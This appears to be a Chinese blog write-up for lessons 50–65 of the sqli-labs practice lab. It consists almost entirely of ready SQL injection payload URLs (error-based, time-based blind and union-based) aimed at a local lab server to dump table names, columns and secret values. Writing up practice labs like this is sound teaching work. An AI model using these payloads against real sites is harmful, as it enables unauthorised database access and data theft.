【20171105早】sqli-libs Less 50-65

Less 50-65 题目类型都没有新奇的注入方式，基本上是以往类型的注入，或者是复合型注入。老黑不进行多加赘述了，多加解释，只会看低读者的智商。payload如下所示

 1 Less 50
 2 http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+
 3 Less 51
 4 http://192.168.162.135/sqli-libs/Less-51/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 5 Less 52
 6 http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 7 Less 53
 8 http://192.168.162.135/sqli-libs/Less-53/?sort=1' and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 9 Less 54
10 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
11 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema ='challenges' and table_name='POV9ATA70T')--+
12 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+
13 http://192.168.162.135/sqli-libs/Less-54/?id=-1' union select 1,version(),database()--+
14 Less 55
15 http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
16 Less 56
17 http://192.168.162.135/sqli-libs/Less-56/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
18 Less 57
19 http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
20 Less 58
21 http://192.168.162.135/sqli-libs/Less-58/?id=-1' union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
22 Less 59:
23 http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
24 Less 60:
25 http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
26 Less 61:
27 http://192.168.162.135/sqli-libs/Less-61/?id=-1')) union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema='challenges'), 0x7e))--+
28 Less 62:
29 http://192.168.162.135/sqli-libs/Less-62/?id=1') and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
30 Less 63:
31 http://192.168.162.135/sqli-libs/Less-63/?id=1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
32 Less 64:
33 http://192.168.162.135/sqli-libs/Less-64/?id=1)) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+
34 Less 65:
35 http://192.168.162.135/sqli-libs/Less-65/?id=1") and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=52, sleep(5), 0)--+

相关阅读:
java反射
 2018 Multi-University Training Contest 4 Problem B. Harvest of Apples 【莫队+排列组合+逆元预处理技巧】
逆元小结
 2018 Multi-University Training Contest 1 Distinct Values 【贪心 + set】
Codeforces Round #533 (Div. 2) C. Ayoub and Lost Array 【dp】
Codeforces Round #533 (Div. 2) B. Zuhair and Strings 【模拟】
2018 Multi-University Training Contest 3 Problem F. Grab The Tree 【YY+BFS】
ZOJ Monthly, January 2019 Little Sub and his Geometry Problem 【推导 + 双指针】
ZOJ Monthly, January 2019 Little Sub and Isomorphism Sequences 【离线离散化 + set + multiset】
EOJ Monthly 2019.1 唐纳德先生与这真的是签到题吗【数学+暴力+multiset】
原文地址：https://www.cnblogs.com/heijuelou/p/7788968.html